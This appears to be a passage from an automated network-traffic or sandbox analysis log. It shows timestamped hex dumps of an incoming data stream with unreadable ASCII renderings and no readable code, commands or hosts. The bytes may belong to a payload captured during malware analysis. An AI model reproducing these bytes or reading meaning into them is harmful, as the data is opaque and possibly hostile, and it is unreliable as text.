                                                                                                                  2023-08-29 17:16:42 UTC1236INData Raw: 10 85 a9 d0 17 a1 b7 61 45 0c 3b 70 f5 49 49 38 e7 f8 19 9d c5 20 e8 d2 ad df a8 d0 d0 38 13 b2 47 ce ba 31 45 4b 11 53 81 01 db d2 30 8b 1b da c1 8b 1b b9 07 4d 81 5b 95 ca 19 14 5d cc cb 59 10 a1 c2 d0 00 a1 64 d6 9d 4c e1 f7 e5 79 69 09 d8 11 e8 fc c8 28 37 d4 9c cc ab d0 94 cc cb 09 85 4d c0 38 35 4b c0 10 9b bb c0 20 8c 90 84 0c e5 6d 27 d3 05 6e 1a d3 05 90 d9 08 bf cc d0 70 31 90 1d 4d a1 c9 1b 0e 8f 97 e8 09 c9 d4 e1 fb 46 e9 9d df ea 0c 39 eb 46 e9 91 b8 44 c9 64 07 45 97 e0 54 9c d4 88 79 31 52 92 5d 34 7e b1 59 c8 5d 4b d0 6d 8b 86 40 44 77 19 3b 75 c2 64 14 ce 8e 16 f2 ea cb 20 e3 97 be 4b e9 76 9b 69 5b 8d c0 9c b1 47 c9 18 d1 44 be 11 27 cc cc ab d3 10 d9 22 9d 65 8d 16 53 de 47 b9 d3 4e a2 39 d3 c8 00 19 5b a7 4d 92 ad 45 41 2a 02 7d 1c ce
                                                                                                                  Data Ascii: aE;pII8 8G1EKS0M[]YdLyi(7M85K m'np1MF9FDdETy1R]4~Y]Km@Dw;ud Kvi[GD'"eSGN9[MEA*}
                                                                                                                  2023-08-29 17:16:42 UTC1240INData Raw: 44 04 a9 d1 08 bd f0 b4 44 c9 37 5b 38 a9 92 11 4a e6 09 95 dd 4a e1 50 cf 8e ee a5 45 a5 92 85 a9 48 5c 60 4a 59 b6 00 6e b3 19 c2 cc 34 f9 d4 ac 75 99 c3 c6 b1 1b a5 5e 4d 92 55 c7 6c 5c 24 ce 04 e1 d4 15 21 18 af 14 a1 52 7c 43 49 19 53 81 45 9a ad 69 49 1d 5b f8 c8 29 5b 10 ed 94 d4 e5 5e 6d ff 7e 0c 99 81 cb cb 48 d1 45 19 01 81 ce 04 bd 5d 10 41 bd d3 8d c9 31 82 ad e2 2a c1 c4 2c bd 59 c0 cb 43 95 95 a2 cb b8 c5 42 6e c8 d4 43 99 51 4f cb 7d 4b c5 5c 58 d9 59 08 10 d2 4b 18 94 13 40 5d 15 c8 07 43 4f d2 50 99 94 dc 05 4e 22 9d b1 3e 0f d0 03 1b 19 5b 10 69 94 9d 95 18 94 f4 49 59 59 d8 ad 7c 1a d8 ce c4 10 92 48 5d 1e 90 65 4a d6 d3 bd 49 22 29 5e 89 ee 08 6e 86 18 d0 2f 6a d8 d3 82 72 c9 cb 45 80 ee 09 c6 a0 18 fb 87 49 3a 18 cf 0c fe d3 8f cd 59
                                                                                                                  Data Ascii: DD7[8JJPEH\`JYn4u^MUl\$!R|CISEiI[)[^m~HE]A1*,YCBnCQO}K\XYK@]COPN">[iIYY|H]eJI")^n/jrEI:Y
                                                                                                                  2023-08-29 17:16:42 UTC1244INData Raw: af 48 1b f3 c7 42 9d 02 30 7a 92 5d 44 e8 0b 09 41 70 c1 95 89 90 11 cc 7c c2 7b c2 9c 09 e5 08 45 0c b1 09 1d b5 c0 d7 9d 19 5c 30 9c 56 db d3 81 89 1a 39 47 9b fb 9e b5 62 54 34 c0 80 7d 59 08 e0 95 08 c8 c8 8e 14 4c 14 3d 3c 9c e9 14 10 9c 29 13 10 9b 2f d3 f0 de 49 1b 11 9c 09 13 73 44 d4 2b 94 c4 4d db 09 25 42 dd d3 89 90 d8 30 4e 89 c7 1d 9c 85 29 da a5 4f 80 32 46 97 db 70 44 71 10 09 c0 3b 1a fb 36 48 da d9 89 81 10 5b b7 51 c0 1c 45 97 f8 08 41 48 c0 cc 44 4b 92 82 5c 90 d0 0e a7 90 19 b1 67 4a 01 08 20 85 bc d1 14 53 c1 d4 20 8d fd d0 08 e5 18 9d a1 51 18 9d 95 88 01 30 48 3c 1c e9 45 04 fd a2 55 ca 5c 18 44 49 30 9d a1 ca d9 d4 c6 8e 09 d4 6c 04 c9 40 63 ca 5c 60 65 48 9a 11 44 72 6b f4 cc 04 89 24 4a cb 25 40 00 a0 73 d0 20 48 59 d4 ce 1c fd
                                                                                                                  Data Ascii: HB0z]DAp|{E\0V9GbT4}YL=<)/IsD+M%B0N)O2FpDq;6H[QEAHDK\gJ S Q0H<EU\DI0l@c\`eHDrk$J%@s HY
                                                                                                                  2023-08-29 17:16:42 UTC1248INData Raw: 41 7a 47 09 41 41 b3 d2 18 51 99 5a 10 69 a1 11 4c c1 0d e9 44 eb 44 d1 c6 24 f5 d1 4a cc 1f 89 57 5a e9 39 0c c9 64 c0 ba 45 6d ca 75 1a b9 40 ce 04 09 82 4e 79 0f 70 da c5 79 57 51 a1 f8 23 dc 29 dd 85 75 a9 19 b0 4b c2 a4 f1 99 44 e9 d1 59 b9 18 61 d0 5d 4b 80 14 49 4e 5d 08 b2 f1 9a af b7 21 2f ae 7e 98 d4 8a 4b da d2 17 19 31 87 31 47 c9 d5 14 a8 1b 9b ae 4c f9 d2 4d d8 19 41 b8 b7 e6 d3 2f f4 b8 33 cc bb 1b 5b b7 fe 89 20 6c 89 54 74 c6 89 18 eb 77 a6 5a 69 03 3d 39 6f b9 85 f1 fc 3b 8d d5 f3 44 ca 19 83 0c f2 19 38 5f 37 1f d0 12 c2 64 90 85 23 19 87 ad 47 19 60 ce 49 5c 6c ce 04 b9 5b 10 dd 19 59 00 e9 92 16 ce 3c 81 d0 cc 0c 81 5b 86 c2 44 4c 45 c0 5c 4c ce 8e 9a 14 75 49 90 9d f9 c0 4c 10 cc 0c 19 44 ce 0c 91 53 85 48 22 d0 00 f1 90 95 cd 46 9b
                                                                                                                  Data Ascii: AzGAAQZiLDD$JWZ9dEmu@NypyWQ#)uKDYa]KIN]!/~K11GLMA/3[ lTtwZi=9o;D8_7d#G`I\l[Y<[DLE\LuILDSH"F
                                                                                                                  2023-08-29 17:16:42 UTC1252INData Raw: 0c 47 1f df ea 4b c9 d3 43 90 d9 08 bf cc cb d9 84 4c 84 30 45 4c c7 1a 9b b8 11 09 d8 a5 52 d6 ce 34 a9 5b 45 8e 16 7f 00 b9 9c 10 cc 4b 5c 59 4a c9 64 0f 45 97 e0 58 9c d4 51 11 da 5c 92 55 64 24 88 93 d6 8e 5c 74 84 31 f2 cd 44 4e 98 32 47 7a cb 27 b4 7a cb d4 d2 49 b6 11 b2 be 90 85 e1 70 9f 6d e4 48 da 77 4a ca 2a dc 45 12 1d 99 45 c8 13 a4 4c 8f 9c ec c4 c9 1b d0 ae 5d 92 9d e1 29 6c d0 46 83 22 9d f5 46 8a 10 63 c1 db d2 e5 31 92 5d e6 e8 e6 eb 05 81 16 44 85 65 18 90 4e 1c 99 34 cc 1c d1 59 d0 3d 58 da e5 1c ad 59 d0 2d 19 d1 66 ab 1c 54 7e 83 fc d6 4d c0 8c 94 a7 4a 09 5c cc dc dd 70 59 8e 9c 18 80 e9 19 2f 05 5c de 55 89 68 18 90 44 c5 de 55 25 eb 5b d1 82 cc cd f3 44 49 e6 a5 54 c2 51 dc c6 a0 19 d1 4a e6 51 c0 46 41 90 d0 0d 4d f2 f1 ce 31 09
                                                                                                                  Data Ascii: GKCL0ELR4[EK\YJdEXQ\Ud$\t1DN2Gz'zIpmHwJ*EEL])lF"Fc1]DeN4Y=XY-fT~MJ\pY/\UhDU%[DITQJQFAM1
                                                                                                                  2023-08-29 17:16:42 UTC1256INData Raw: 05 08 1b bc 87 90 a9 d5 a1 48 d5 f0 43 f9 19 1d d9 90 d5 e0 4f 99 11 32 46 97 db 70 44 1c 2f d9 c0 0b 1a 10 c2 40 d5 58 4c c2 18 62 5d 90 d5 0e a4 91 1d d1 55 90 05 d1 ce 5b 00 09 8c 97 11 32 9c 49 7b d4 5d 91 7c 1c 76 ec 18 c1 5f 91 7c 40 46 ab 19 9d fd 89 18 9d a1 48 54 00 c4 51 b9 dd 45 3c 1c e9 08 ad 6b c0 c6 09 5c 18 44 60 54 34 e7 f8 1d d8 6c 04 c9 80 63 ca 5c 78 44 59 9a 11 44 72 2b f4 cc 04 ed 18 4a cb 59 c0 4a a0 77 50 23 09 1d d0 ce 1c fd d3 94 c0 4c 78 44 c9 b1 fb 10 ed 92 ad b5 c2 2b 12 75 1c 90 55 87 88 b9 d0 82 c0 3d 45 55 38 1a 95 9d 89 3c fb 82 cd 1a 11 c4 6c e1 df ea b3 29 f6 8d 62 cf 59 b7 88 92 03 d4 49 ab f4 89 1c a5 71 45 fb 3d 85 d9 e8 19 50 f5 22 48 74 e4 49 fd 72 45 d1 b8 d0 07 8f 4c c6 d5 e8 19 72 82 1c 49 e9 8d c0 64 32 e5 a9 37
                                                                                                                  Data Ascii: HCO2FpD/@XLb]U[2I{]|v_|@FHTQE<k\D`T4lc\xDYDr+JYJwP#LxD+uU=EU8<l)bYIqE=P"HtIrELrId27
                                                                                                                  2023-08-29 17:16:42 UTC1260INData Raw: 9d 89 27 5b 8e 88 1a 51 35 c2 15 9d f9 c8 1b 91 28 c2 54 c4 6e c1 d6 59 c8 08 20 5b 08 55 98 d2 74 48 58 5b 08 69 98 d2 84 01 92 9d c5 c9 94 d4 d3 c0 54 3c 46 cf 08 d0 cb 91 94 98 44 4b 44 08 9c 69 5c 08 9e d4 11 91 5a ff 94 53 c4 48 1a 9b cd 45 23 09 45 82 11 9e 45 8a 11 51 44 8a 89 58 4a 87 08 28 1a 09 31 10 4d c8 18 d3 27 89 08 5b c7 61 c0 44 41 41 92 da 3d 89 1b 5a d0 08 18 f2 ce cb 31 58 51 70 99 8b c6 8e 19 d1 c6 24 f5 d1 4a cc 4a d1 c5 4d 99 ad ae 49 6d 9c c5 49 64 c0 ba 3d 03 5b 10 69 99 5b 00 55 92 9d 55 1b 59 8a 65 19 92 95 c5 18 19 ed ad b2 d9 7f bb b6 92 85 75 c9 1a d0 7e 11 92 6d 15 49 14 10 42 55 d9 d7 5d 48 d8 d7 17 19 48 87 c8 c4 0d d1 05 4c f1 11 ef b7 e6 3b 78 ca d8 c2 90 42 4b 80 12 3d 08 d0 5d 1b 48 94 49 a6 b2 90 49 42 1d d3 97 09 a5
                                                                                                                  Data Ascii: '[Q5(TnY [UtHX[iT<FDKDi\ZSHE#EEQDXJ(1M'[aDAA=Z1XQp$JJMImId=[i[UUYeu~mIBU]HHL;xBK=]HIIB
                                                                                                                  2023-08-29 17:16:42 UTC1264INData Raw: 87 0b 90 55 07 7e fb ec c6 70 92 d0 53 c0 5c 2c cd 0c a6 5b 45 0f 11 5b 8d 62 d3 59 08 49 bd 5b 0b 45 32 9e 41 cc 99 2f cc 04 91 17 00 ad 58 d9 45 3d 12 5b 4a c8 f8 2f 4a 1b 19 80 00 ad 9c f0 49 81 4b d1 48 59 16 67 0a 4b 6c d1 8d cc e6 dc 83 0c a9 e3 e5 4b d8 39 4a c9 19 31 44 c1 54 0f 6e 0a 11 d0 ce 42 92 ab 4d 62 e0 fb 47 83 d9 ff 66 8b ee 02 66 98 19 d3 87 c2 4c 58 cc 04 b5 f0 ce 02 1d 59 c0 fb 5c 96 41 41 32 18 cc 9b 51 5b 0e 45 32 90 8d c2 5c 74 cc c4 78 f4 ce 49 54 34 7e 81 16 44 00 a6 29 e9 10 81 90 c2 0f 89 19 03 c0 49 d9 df c1 3a 08 d0 45 cc 09 02 4a cd 72 a1 45 80 16 54 e7 2a 69 d0 ce 1c d1 f1 44 11 b9 d0 c5 ca 64 f8 45 46 9d 9e d5 49 39 eb 84 46 9e e4 35 49 20 85 55 c1 16 57 6e c9 19 ba 29 c4 95 55 71 f9 1c a0 5f a1 5d f5 e4 6f 52 70 5e 19 37
                                                                                                                  Data Ascii: U~pS\,[E[bYI[E2A/XE=[J/JIKHYgKlK9J1DTnBMbGffLXY\AA2Q[E2\txIT4~D)I:EJrET*iDdEFI9F5I UWn)Uq_]oRp^7
                                                                                                                  2023-08-29 17:16:42 UTC1268INData Raw: f3 3c 19 53 05 a5 92 8d 91 f1 e6 b0 49 62 11 16 c8 75 19 89 95 62 c3 59 65 0c b9 5b 00 8d 29 f7 30 d5 19 59 38 e1 90 95 85 c0 44 d0 b1 c0 54 60 ae 10 92 95 05 7d 92 a5 65 c2 44 c0 27 51 da 40 e8 29 17 dc 12 1f 4a 42 4b 6b 16 80 ad 63 86 2e b5 2d 09 50 75 4e 1c 51 69 8e b9 df c8 5d 2e 5b 30 58 eb b4 c8 45 06 51 27 62 de d3 45 9e 1a 1f 13 a1 07 55 bb 01 e6 39 a6 f8 59 8d b1 79 a8 cf 47 c2 19 d9 b9 62 c6 df ea 97 19 5b 30 e1 d8 2b 4d 4a c6 d0 ce 34 a9 df f3 75 27 5b 05 3c 85 5b 95 c8 fb e2 4f b3 19 df ea b7 d8 2f 4d 4a e3 90 ce 81 d8 33 4d 42 39 d2 ed 89 16 66 52 88 f0 c0 55 76 e8 d1 c5 98 d8 38 5d 46 b6 06 b5 62 59 70 84 b3 11 d3 94 d9 5c 11 45 b1 11 d3 83 88 fb c0 84 59 f9 c8 4e 93 49 c1 4e 91 92 90 00 89 1a 1a cc 51 99 a0 46 6f e3 d1 54 49 17 9d b5 d9 17
                                                                                                                  Data Ascii: <SIbubYe[)0Y8DT`}eD'Q@)JBKkc.-PuNQi].[0XEQ'bEU9YyGb[0+MJ4u'[<[O/MJ3MB9fRUv8]FbYp\EYNINQFoTI
                                                                                                                  2023-08-29 17:16:42 UTC1272INData Raw: c4 c9 e6 95 ba 0c e6 95 3a b6 5c 2f 00 b6 5c 2f 00 b6 5c 2f 00 b8 5c d6 b6 79 5c 25 00 d3 7b 2f 00 b6 5c 2f 00 b7 5c 64 59 1f ed 95 56 c8 19 21 00 43 98 d0 58 b8 5c d1 c7 49 e6 95 ba 0c d4 38 fe b7 f6 2f 00 b6 5c 2f 00 b6 5c 2f 00 b6 5c 2f 00 76 e6 95 ba 0c e6 95 ba 0c e6 95 b6 0c 3d 21 ba b6 5c 2f 00 b6 5c 2f 00 b6 5c 2f 00 b6 5c 2f 00 f6 e6 95 ba 0c e6 95 ba 0c e6 95 b0 0c 3f e1 4a 82 e6 ec b0 76 4a 2d 00 bf e9 2f 47 b1 26 0b bd 4b ea 95 83 b6 1b 28 47 2f e1 d2 b6 0c ef 46 ba 4b e1 d2 73 b9 1b 2f 00 b6 5c 2f 00 90 e2 95 25 32 e6 95 ba 0c 53 2f 00 b6 5c 2d b4 0c 18 51 c5 b6 5c 2f 00 b6 5c 2f 00 b6 5c 4f ba 0c e6 95 ba 0c e6 95 b4 0c bf 8f b2 0c 1f ea 27 84 e6 95 ce e3 a0 d0 95 6a 4c 10 c6 8f 18 fb 45 83 92 85 69 c0 54 1c ce 49 d1 53 a4 48 18 9d 91 6d 19
                                                                                                                  Data Ascii: :\/\/\/\y\%{/\/\dYV!CX\I8/\/\/\/v=!\/\/\/\/?JvJ-/G&K(G/FKs/\/%2S/\-Q\/\/\O'jLEiTISHm
                                                                                                                  2023-08-29 17:16:42 UTC1276INData Raw: fa b6 a6 2f fa b6 a6 2f fa a0 a6 6e 7e ac a6 d1 44 ab a6 d1 44 ab a6 ea ba f6 4c 36 fa 9d e0 6f 85 b5 a6 3c ac f6 f5 c5 a4 f6 c1 3b fa 91 e8 6f 95 c0 64 80 e9 c0 4c 34 aa f6 f5 10 fd e9 ac b2 c0 91 f8 6f d0 09 18 31 fa c4 f8 d0 28 a9 a6 55 a4 49 f9 6f 38 08 1d 34 fa 38 52 b0 44 aa a6 b7 e4 4b 4c 3c ac f6 4d 8b 05 4b f8 6f 09 39 19 21 1a 09 ec 8f 93 96 e4 8f d4 48 ef 8f 84 49 ee 8f 4a 38 1c 21 1a 03 49 27 1a 2d b8 d0 10 71 3b b0 f5 69 94 d4 3a 4a d8 93 25 0c f9 c0 ce 8b ee 00 64 19 d8 fb 83 48 29 b0 92 62 ca f3 10 a1 92 84 18 99 08 b0 a9 5b 79 6c 56 29 32 80 8a 6a 54 e8 54 29 ad c4 25 a1 b1 5d 01 78 08 b0 a9 58 79 34 f5 16 89 5b bd ca de 05 1a 34 d9 42 12 9f 5f a1 4e dd 4e df d1 1e 0c 72 27 98 4e 94 a3 71 8e 8a 99 3e 02 20 47 5f 08 27 47 19 f1 17 a5 48 92
                                                                                                                  Data Ascii: //n~DDL6o<;odL4o1(UIo848RDKL<MKo9!HIJ8!I'-q;i:J%dH)b[ylV)2jTT)%]xXy4[4B_NNr'Nq> G_'GH
                                                                                                                  2023-08-29 17:16:42 UTC1280INData Raw: 44 c1 4c 0f 6f 83 c9 d0 ac 3d 13 50 87 48 c9 39 41 3c e0 20 45 c2 56 d8 6e 46 18 00 12 c2 56 dc 6e 06 1d 59 55 04 a9 e3 8c 79 1d d3 c8 01 38 60 45 f1 df 95 85 29 1c 14 cc 59 6c 18 c6 8a 69 97 9b 4a c0 c8 cc 14 a5 00 55 3b 79 a5 89 ca 09 16 6d c8 e7 f2 07 56 92 16 59 a1 2a 30 5f 38 12 83 7c 19 f1 31 0f 5d 39 c7 78 78 20 3b 52 5b 23 86 6c 9a 19 2f 92 7b 23 12 a5 48 90 95 0f e9 1d d4 56 49 1d 22 f4 40 1d 3b 13 42 5a d3 a1 4b 8a 32 47 d5 f1 d2 86 e2 f6 d2 a2 4b 7d 32 47 ed f1 d2 d1 a6 1b d5 a2 4b 2c 32 47 d1 92 95 e5 ca 39 10 5a ca f9 30 a5 6d 92 a5 05 d5 9a 16 5a ca ff 20 7d ed 19 53 82 56 9a 37 a5 c2 44 50 dd ca da cf c6 aa f9 a0 5c 49 49 38 4e 5c e7 2f cd 0c 19 7f c1 89 6d d6 83 0c ce d0 45 a2 13 5b 08 85 20 9d 05 e1 16 42 00 9e 93 b5 44 9c 18 b1 44 1c d5
                                                                                                                  Data Ascii: DLo=PH9A< EVnFVnYUy8`E)YliJU;ymVY*0_8|1]9xx ;R[#l/{#HVI"@;BZK2GK}2GK,2G9Z0mZ }SV7DP\II8N\/mE[ BDD
                                                                                                                  2023-08-29 17:16:42 UTC1284INData Raw: 44 59 6c dd ba c9 6f dc ad d5 d6 2d ba 29 1a d4 ae 90 79 c6 1b 41 6f c3 ce 69 57 c0 cc 7d d8 81 45 0d d8 d0 41 09 22 96 4d 3b f4 e3 dd 89 47 8b 4d 42 38 ed 03 59 89 8f 45 72 de 17 43 69 31 e0 35 69 6d d6 15 a1 4c b0 41 70 67 d0 49 3d 32 83 76 92 20 ae cd 41 6f ca 35 da 92 d4 42 e9 28 d2 42 ed 2d 93 c6 8e 41 eb 1b 61 11 a2 a3 18 1e f6 a5 4b 42 8f 24 ed 20 ba 51 a1 cf 90 4c f9 1b d6 59 8e 19 d1 40 51 17 40 7f 4b 4e 5b 45 b0 6d f5 13 21 1a bb 76 49 69 5d 32 b5 e6 e6 2f 5d 59 87 ad dd 96 d5 45 1c 25 10 07 c7 4a ec ae 5d f1 8e 83 74 4e f4 ad e0 7b d1 82 16 a2 c6 13 1e 19 5b 38 45 9a f7 45 a1 9f f7 c4 55 a8 94 41 5b 39 83 15 53 92 1e 41 a1 ba 70 4d c2 c1 55 9e 34 19 da 13 a1 f4 35 41 49 92 50 86 a2 1d 59 72 7a d9 30 4f 41 44 12 4d d1 1d 53 a9 21 b8 d0 15 59 25
                                                                                                                  Data Ascii: DYlo-)yAoiW}EA"M;GMB8YErCi15imLApgI=2v Ao5B(B-AaKB$ QLY@Q@KN[Em!vIi]2/]YE%J]tN{[8EEUA[9SApMU45AIPYrz0OADMS!Y%
                                                                                                                  2023-08-29 17:16:42 UTC1288INData Raw: 4a e6 4c 2c 46 1c 39 d0 46 bb 92 85 61 c2 63 d4 45 4a e0 53 38 61 19 a4 0d 49 9c 10 3b 29 92 9d b1 4a 19 1b cc 04 09 59 00 55 92 d0 00 b1 32 13 46 b1 92 95 45 5d 9c 10 ce 87 67 cc cc 49 5c c8 c0 92 67 db ce 8a 19 5a 54 c1 0e 97 04 01 6c d0 b2 c4 1d cb 6e b1 e6 9d 45 51 6c 37 46 3c e5 d3 38 49 09 2f 08 55 6c 19 ae 55 18 d0 02 51 92 08 ba 3c e1 86 05 1e f1 7b 38 4c 19 d2 59 bd 19 53 81 45 52 a5 af c2 5c d0 61 23 19 2f 35 4d e6 c5 45 e9 09 e0 35 c0 5c 20 ce 49 5c 20 1a 17 42 19 87 6d 1d d0 89 48 19 5b ba 1c 92 3c 45 ca f5 dc 13 b6 6c c8 76 49 ef 2f 30 5d 90 a5 b1 b6 19 a5 4d c0 6c 28 ba 5c 05 d0 54 79 69 eb 83 c0 5c 2c c5 46 9d 43 45 49 19 87 45 5e 11 2f 50 11 19 96 ce b1 22 2e 45 3d 60 e9 30 55 6d ca 12 41 e6 c5 e9 c9 11 78 44 c0 5c d0 bd 3d 1a 86 ae 4b 73
                                                                                                                  Data Ascii: JL,F9FacEJS8aI;)JYU2FE]gI\gZTlnEQl7F<8I/UlUQ<{8LYSER\a#/5ME5\ I\ BmH[<ElvI/0]Ml(\Tyi\,FCEIE^/P".E=`0UmAxD\=Ks
                                                                                                                  2023-08-29 17:16:42 UTC1292INData Raw: 5f 13 da de 56 a9 ba f1 4a 4a 19 59 6b 01 3c df 4e 4f 19 c9 49 69 b1 d8 c0 49 e6 a5 4e cc ef a5 42 e8 3b c0 64 46 3a 38 bf 48 7d 18 ad 4f 0b 34 4d c8 11 d6 45 c0 61 dc fd c0 69 c0 a1 41 37 79 68 40 0d f3 4c 1b a9 f3 4c 81 c1 f7 4c 4e 25 d9 ad 03 65 b3 43 dd 79 d6 ce b9 59 fc 66 58 f9 e9 c8 0f 15 30 7c 2f de 96 49 4d 11 d0 07 29 18 d8 15 b6 0c 90 6d 5f 29 a0 82 0f bb d8 ce e7 df 10 4d ad 2e b3 64 7f ba d8 0b 6a 16 d0 5b c3 4c dc 76 80 58 f2 05 98 91 80 48 c2 4c 12 67 40 19 d0 83 09 15 d0 cc 19 09 c8 cc 01 11 9b 55 c9 61 c8 c1 92 b9 a5 48 b6 6c cc c4 06 b5 70 6f 09 f2 ad 13 1e f1 33 25 36 92 90 bd c2 d6 38 bc 9e 5d c3 26 69 73 c4 ad ba cb f1 49 c0 5f d0 55 3d 52 5a 08 55 91 9e 4f 44 db fe 03 a9 12 58 1b 45 90 30 0d 4d 92 96 55 89 80 50 49 4b 18 55 e5 44 15
                                                                                                                  Data Ascii: _VJJYk<NOIiINB;dF:8H}O4MEaiA7yh@LLLN%eCyYfX0|/IM)m_)M.dj[LvXHLg@UaHlpo3%68]&isI_U=RZUODXE0MUPIKUD
                                                                                                                  2023-08-29 17:16:42 UTC1296INData Raw: 51 5c 1d e0 ca 59 1d d8 65 a0 c5 50 62 70 47 c0 4a 45 9d cb 55 da c9 5f 0d 46 9d 6c 2e 49 0d b0 45 06 7a d0 a3 69 1f b0 45 12 1c b3 45 89 f9 d2 0d 3d 13 b8 b5 43 37 50 49 fb 38 ff 0b 44 ef 11 4f 41 9b d7 fa 28 1e 59 00 ed 6c d0 46 c0 64 74 b3 88 1d 5b 45 91 6c d2 ce 96 ef 11 47 cd 92 00 c5 49 ce 26 84 48 79 d0 55 8e 92 a6 55 e6 10 c3 14 b6 4d a5 e1 39 19 de 84 49 14 91 45 45 bc 91 45 46 58 d0 4f 1a 48 d0 4c 08 19 9a 4d 08 19 db 04 49 1f 82 14 49 1c 05 04 49 1d 91 45 4e a9 dd 7d 79 10 c2 37 59 b1 38 22 be c8 dd 19 c2 64 9e ed 49 1e e1 3c 58 60 22 0a 58 60 d8 bb 49 36 db 6a 42 36 db 6a 42 36 db 6a 42 36 db 2c 63 12 50 68 29 0d 98 74 13 28 d9 41 be 2e d9 ca 41 9c d8 f2 4b 1e 8f 42 16 1e 8f 42 00 4d d7 a5 65 9f c2 7b bf 98 c2 09 fd f0 02 e0 55 1b e8 4d 76 09
                                                                                                                  Data Ascii: Q\YePbpGJEU_Fl.IEziEE=C7PI8DOA(YlFdt[ElGI&HyUUM9IEEEFXOHLMIIIEN}y7Y8"dI<X`"X`I6jB6jB6jB6,cPh)t(A.AKBBMe{UMv
                                                                                                                  2023-08-29 17:16:42 UTC1300INData Raw: 85 4c f0 da 42 c9 0e 97 43 09 16 2f 34 41 f1 1b 62 c8 1f 5a 49 4d 1f 66 bc 44 1f ba 45 5d 73 d0 84 55 53 50 49 c4 51 d8 05 be c1 cb 85 6a d8 5b 4d 18 38 d1 2a 1f 4e 5b 38 09 91 2c 15 c9 73 d0 12 c2 e8 38 5e c9 12 d1 84 76 93 9d 49 c1 51 d8 ae 6b 28 d0 76 a1 4f 7b 84 4d 6c d7 c5 f1 17 d0 42 c9 f2 f0 c6 4f 19 5b 08 b5 90 a8 41 c2 4f d0 4d 88 f8 d2 ce 5d 08 59 81 19 15 10 47 c0 1d c1 c4 3c 95 59 44 8b 00 53 20 b1 19 86 c8 0c 95 28 15 88 03 d1 c2 b8 f1 7f 45 09 1c 10 5f 6a 99 c2 c0 80 92 80 49 c9 6d d5 cc 18 15 3b 4e 09 51 91 85 6d e1 59 51 f0 46 90 5a 19 05 38 47 c9 06 50 51 0d 37 ba 5d a1 9d 7f e3 8b 14 d6 82 49 21 10 3a e3 da 55 40 d1 9f d5 05 c0 1c 51 c3 4c bb 98 c2 4c 0d 38 2f cf 1c 80 83 4b 8a d3 62 c9 57 38 7d c9 57 db be e9 2c 50 08 41 90 d1 ce 09 15
                                                                                                                  Data Ascii: LBC/4AbZIMfDE]sUSPIQj[M8*N[8,s8^vIQk(vO{MlBO[AOM]YG<YDS (E_jIm;NQmYQFZ8GPQ7]I!:U@QLL8/KbW8}W,PA
                                                                                                                  2023-08-29 17:16:42 UTC1304INData Raw: 1d 59 64 16 f5 48 19 a2 af 72 df a3 09 c2 c1 d0 ce 08 09 11 a6 4b 92 e4 45 4a 20 86 51 3c 25 53 3b 69 39 d0 31 40 73 f1 5d 68 a9 51 55 4c 1f 53 23 6d 19 86 34 70 5d 95 49 29 58 df 31 47 29 ef cc 8d 1d db 87 42 1d 3b 63 e9 12 b0 57 49 ef 8c 47 49 f2 ca ce 3c 19 dc c0 bf 6d c3 13 a1 16 d8 32 4b 19 b2 4c 35 1f 5b 43 58 d9 d3 41 17 42 e0 4a 16 d0 12 5b 41 11 dd 35 43 b9 fe 44 50 92 29 ad 6f 00 a1 38 c9 94 ac 7e 59 1d e7 12 d0 c9 d7 ca e6 e9 91 04 7b f1 c6 35 41 11 53 20 41 e9 cb 4d 19 92 1f 05 a1 30 38 ba b6 49 b0 44 6a 1f 66 64 33 c9 52 ce 91 6d d5 ad 09 54 b1 b8 b6 46 8e e5 68 44 d9 0f 4f 48 81 45 75 e0 5b 02 55 19 e3 9e 72 da a4 3b 70 41 d8 4d 3d 60 b1 0b c0 44 28 ad 4d f9 37 15 53 5c 2c ad 20 c7 d5 94 14 05 60 44 3f 55 86 c6 34 1d 2c 45 88 6f e4 dd 3d 01
                                                                                                                  Data Ascii: YdHrKEJ Q<%S;i91@s]hQULS#m4p]I)X1G)B;cWIGI<m2KL5[CXABJ[A5CDP)o8~Y{5AS AM08IDjfd3RmTFhDOHEu[Ur;pAM=`D(M7S\, `D?U4,Eo=
                                                                                                                  2023-08-29 17:16:42 UTC1308INData Raw: 83 48 34 a5 b4 19 22 16 30 5e 69 c0 6d 19 b5 54 4d 89 6c e0 54 5b e6 e5 45 7e 8d eb 35 1b cd c1 27 48 6d c9 26 48 c7 d4 25 48 68 d0 b4 36 d9 d1 83 29 4b 20 10 22 e2 dd 0f 4f 3c 9b 43 47 56 d6 04 4f ee ff 55 82 56 d6 d4 c8 d9 d1 24 06 1f 5b 44 c8 69 75 10 41 4b 2f 15 65 f2 b7 9e db 86 65 44 79 56 d3 c6 48 2d 9b 46 6b 00 46 65 19 12 90 4f 46 e9 db ce 59 09 0c 41 c0 08 a0 79 a2 2c ba 49 c4 19 9d a5 18 e6 a0 41 a1 8f 68 84 4a 19 00 45 79 0e 71 ef c1 c9 d0 54 eb 1b fb 10 b9 c9 d2 46 1c f9 51 47 4a 32 95 b1 4a 5c 34 85 2b 19 8e 4f f5 39 19 87 45 19 1c 44 49 92 2f 45 1c 92 3c 16 1e 92 ad 4d 49 9c 2f ce 90 6d 98 ce 0c 19 dc c0 89 6d 91 13 c2 6c d0 55 cc ef a4 7d c2 11 59 45 47 92 90 41 c0 5f d4 7e 49 e2 a4 6f c4 5c d8 15 c2 19 1f ad 5a cd 2f ba c2 11 f2 44 48 29
                                                                                                                  Data Ascii: H4"0^imTMlT[E~5'Hm&H%Hh6)K "O<CGVOUV$[DiuAK/eeDyVH-FkFeOFYAy,IAhJEyqTFQGJ2J\4+O9EDI/E<MI/mmlU}YEGA_~Io\Z/DH)
                                                                                                                  2023-08-29 17:16:42 UTC1312INData Raw: 25 c9 1c af 45 c2 54 24 ad fd ab 2f ba 6d 9a 28 85 9a 2a 10 45 77 16 44 d7 89 19 ff 2f 41 5b 11 00 bd 59 87 f4 09 6b 38 eb e4 98 eb c5 59 b5 51 07 49 6d d7 ce 4f 1a 95 99 a2 19 d5 ce 0c c5 fb 43 c0 5c d6 fd c9 87 10 60 c0 5c 6c ce 0c 19 34 6e 0c c5 59 00 81 92 fa 03 c9 1a 1c c4 3d 4e 90 71 19 4a 54 2f 4a 9d cf ad ad e6 d2 45 6f b1 2c ac 5d da c0 35 89 09 90 85 44 c9 9d 99 18 49 f1 48 0d 3a dd 65 43 94 54 48 c2 59 cc 45 45 f9 a4 4d ab 03 da f9 c8 7a 6c a4 55 d1 5b 08 a1 99 fb 8d c0 54 1c ae d1 f9 d8 4f 59 f9 d8 02 af 11 dc ad b5 b5 f2 46 89 15 24 2f 43 db 92 16 1a e0 d0 5c a1 80 b0 4e 09 0f 33 4c 